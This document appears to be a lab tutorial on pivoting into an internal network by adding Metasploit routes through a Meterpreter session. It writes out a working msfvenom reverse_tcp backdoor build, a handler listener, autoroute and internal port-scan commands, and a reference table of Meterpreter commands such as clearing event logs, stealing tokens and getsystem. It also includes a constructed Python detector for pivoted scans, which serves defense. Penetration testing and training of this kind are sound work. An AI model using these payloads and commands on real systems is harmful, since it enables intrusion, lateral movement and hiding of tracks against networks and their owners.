Pivoting: Reaching an Internal Network by Adding Routes in MSF


1 Metasploit Pivoting: How the Route-Adding Method Works

The pivot works through network-layer reachability: Metasploit adds a route for the target segment whose next hop is the Meterpreter session, so modules run from the framework reach the internal segment through the compromised host.

The drawbacks are that the method is restrictive (it can only be used from within Metasploit) and that its traffic is easily blocked by a firewall.

2 Lab Environment

2.1 Establishing the meterpreter reverse connection

Generate the Metasploit backdoor program

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.2 lport=4444 -f exe > /var/www/html/evil.exe

Configure the listener on Kali for the meterpreter reverse connection

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.2

run

Download the Metasploit backdoor program on the web server and run it

The meterpreter reverse connection is established successfully

2.2 Viewing current system information

Check the routing information of the current system; a new segment is found: 10.2.1.0/24

ipconfig

route list

Add a route to that target segment

run post/multi/manage/autoroute

run autoroute -p

View the added route; its next hop points to session 1

2.3 Scanning hosts in the new segment via the added route

Scan with the MSF port-scan module

use auxiliary/scanner/portscan/tcp

set ports 135,139,445,23,80,8080

set rhosts 10.2.1.1-10.2.1.3

run

Nmap scan: the result shows the ports are filtered by a firewall

db_nmap -sV -p23,80 10.2.1.3

# If the database is not connected, run msfdb init first and then restart msfconsole
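From the defender's side, a pivoted port scan like the one above leaves a distinctive fan-out in firewall or NetFlow logs: one source on the internal segment touching several hosts and several ports within a short window. The following detector is an added example, not code from the original post; the flow records and the pivot address 10.2.1.100 are constructed, and the 3 hosts x 6 ports pattern mirrors the portscan/tcp settings above.

```python
import ipaddress
from collections import defaultdict

INTERNAL_SEGMENT = ipaddress.ip_network("10.2.1.0/24")  # segment reached via the pivot

def constructed_flows():
    """Constructed flow records (ts_seconds, src, dst, dport), not real telemetry.
    10.2.1.100 is an assumed address for the dual-homed, compromised web server;
    its 3 hosts x 6 ports fan-out mirrors the portscan/tcp settings above."""
    flows = [(0.0, "10.2.1.2", "10.2.1.3", 80),   # ordinary single connections
             (5.0, "10.2.1.5", "10.2.1.3", 80)]
    t = 10.0
    for host in (1, 2, 3):
        for port in (135, 139, 445, 23, 80, 8080):
            flows.append((t, "10.2.1.100", f"10.2.1.{host}", port))
            t += 0.2
    return flows

def detect_fanout(flows, segment=INTERNAL_SEGMENT, window=60.0,
                  min_hosts=3, min_ports=4):
    """Return {src: (hosts, ports)} for every source that, within `window`
    seconds, contacted >= min_hosts distinct hosts and >= min_ports distinct
    ports inside `segment`. Single-host, single-port traffic is ignored."""
    by_src = defaultdict(list)
    for ts, src, dst, dport in flows:
        if ipaddress.ip_address(dst) in segment:
            by_src[src].append((ts, dst, dport))
    alerts = {}
    for src, events in by_src.items():
        events.sort()                      # sliding window over time-ordered events
        for i, (start, _, _) in enumerate(events):
            hosts, ports = set(), set()
            for ts, dst, dport in events[i:]:
                if ts - start > window:
                    break
                hosts.add(dst)
                ports.add(dport)
            if len(hosts) >= min_hosts and len(ports) >= min_ports:
                alerts[src] = (sorted(hosts), sorted(ports))
                break
    return alerts

if __name__ == "__main__":
    for src, (hosts, ports) in detect_fanout(constructed_flows()).items():
        print(f"possible pivoted scan from {src}: hosts={hosts} ports={ports}")
```

Because the scanning traffic originates from the compromised host's own interface on 10.2.1.0/24, a segment-level firewall that filters these ports (as the Nmap result above shows) both blocks the scan and provides the log source for this kind of detection.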

3 Basic meterpreter commands

Stdapi: Networking Commands
===========================

Command      Description
-------      -----------
arp          Display the host ARP cache
getproxy     Display the current proxy configuration
ifconfig     Display interfaces
ipconfig     Display interfaces
netstat      Display the network connections
portfwd      Forward a local port to a remote service
resolve      Resolve a set of host names on the target
route        View and modify the routing table

Stdapi: System Commands
=======================

Command      Description
-------      -----------
clearev      Clear the event log
drop_token   Relinquishes any active impersonation token.
execute      Execute a command
getenv       Get one or more environment variable values
getpid       Get the current process identifier
getprivs     Attempt to enable all privileges available to the current process (elevate privileges as far as possible)
getsid       Get the SID of the user that the server is running as
getuid       Get the user that the server is running as (show the current user)
kill         Terminate a process
localtime    Displays the target system local date and time
pgrep        Filter processes by name
pkill        Terminate processes by name
ps           List running processes (list processes)
reboot       Reboots the remote computer
reg          Modify and interact with the remote registry
rev2self     Calls RevertToSelf() on the remote machine
shell        Drop into a system command shell
shutdown     Shuts down the remote computer
steal_token  Attempts to steal an impersonation token from the target process
suspend      Suspends or resumes a list of processes
sysinfo      Gets information about the remote system, such as OS (show system information)
migrate      Migrate the server to another process (inject into a process)
getsystem    Attempt to elevate your privilege to that of local system. (elevate to local SYSTEM through a variety of techniques)